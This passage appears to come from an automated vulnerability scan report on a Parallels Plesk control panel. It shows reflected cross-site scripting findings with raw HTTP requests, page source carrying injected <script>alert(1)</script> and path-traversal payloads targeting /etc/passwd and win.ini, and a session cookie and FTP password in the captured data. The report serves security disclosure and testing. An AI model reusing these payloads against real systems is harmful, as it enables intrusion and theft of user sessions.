XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/winnt\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSSfdf080d955073164a20925b1","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=be05c143230ef0b43bc9cb9064228976\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2. Cross-site scripting (reflected)  previous  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload f20a2<script>alert(1)</script>641f862f323 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/custom-button@new/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary08k3wexWDUqjogvg
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 21605

------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="text"

inject
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="place"

domain
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="sort_key"

100
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="fname"; filename="160x160.jpg"
Content-Type: image/jpeg

......JFIF.....`.`......Exif..MM.*.............?...z.;.....G.....i.................~...........~...j...........X.......~...............n............................$.......K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .B.o.s.t.o.n.,. .M.A. .h.t.t.p.:././.h.o.y.t...n.e.t.;.h.0.2.3.3.2.;.H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...Hoyt LLC Research, Boston, MA http://hoyt.net;h02332;Hoyt LLC Research..h.0.2.3.3.2.;.H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...h02332;Hoyt LLC Research..XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86..Hoyt LLC Research.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6...X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6...H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6.......http://ns.adobe.com/xap/1.0/.<?xpacket begin='...' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:creator><rdf:Seq xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>Hoyt LLC Research, Boston, MA http://hoyt.net</rdf:li><rdf:li>h02332</rdf:li><rdf:li>Hoyt LLC Research</rdf:li></rdf:Seq>
           </dc:creator></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:MicrosoftPhoto="http://ns.microsoft.com/photo/1.0/"/><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:subject><rdf:Bag xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Bag>
           </dc:subject><dc:title><rdf:Alt xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Alt>
           </dc:title><dc:description><rdf:Alt xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Alt>
           </dc:description></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:MicrosoftPhoto="http://ns.microsoft.com/photo/1.0/"><MicrosoftPhoto:LastKeywordXMP><rdf:Bag xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Bag>
           </MicrosoftPhoto:LastKeywordXMP></rdf:Description></rdf:RDF></x:xmpmeta>



















<?xpacket end='w'?>...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222...........".....................................    
.....................}........!1A..Qa."q.2....#B...R..$3br.    
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................    
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....}..g..^_..}....7m..g...7I.l5....Tt.&..[n...vH8.....?..
